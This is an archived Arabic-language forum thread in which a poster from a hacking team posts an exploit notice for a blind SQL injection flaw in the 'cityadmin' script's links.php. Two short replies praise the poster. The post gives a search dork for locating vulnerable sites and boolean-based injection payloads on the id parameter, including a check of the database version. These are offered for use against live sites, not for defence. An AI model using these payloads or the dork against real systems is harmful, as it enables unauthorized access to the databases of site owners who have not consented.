المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : cityadmin (links.php) Blind Sql Injection Vulnerability



AtT4CKxT3rR0r1ST
02-03-2010, 03:00 PM
cityadmin (links.php) Blind Sql Injection Vulnerability
================================================== ============

################################################## ##################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : cityadmin
.:. Download Script: http://www.redcow.ca/products/cityadmin/
.:. Bug Type : Blind Sql Injection
.:. Dork : "Powered by cityadmin and Red Cow Technologies, Inc."

################################################## ##################

===[ Exploit ]===

www.site.com/links.php?id=[Blind SQL INJECTION]


www.site.com/links.php?id=NULL+and+1=1 >>> True
www.site.com/links.php?id=NULL+and+1=2 >>> False


www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=5 >>> True
www.site.com/links.php?id=NULL+and+substring(@@version,1,1)=4 >>> False



################################################## ##################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack

صقر العرب
02-05-2010, 07:55 PM
رهيبب انت ولله

رمز الهكر
02-12-2012, 02:50 AM
واصل ابداعك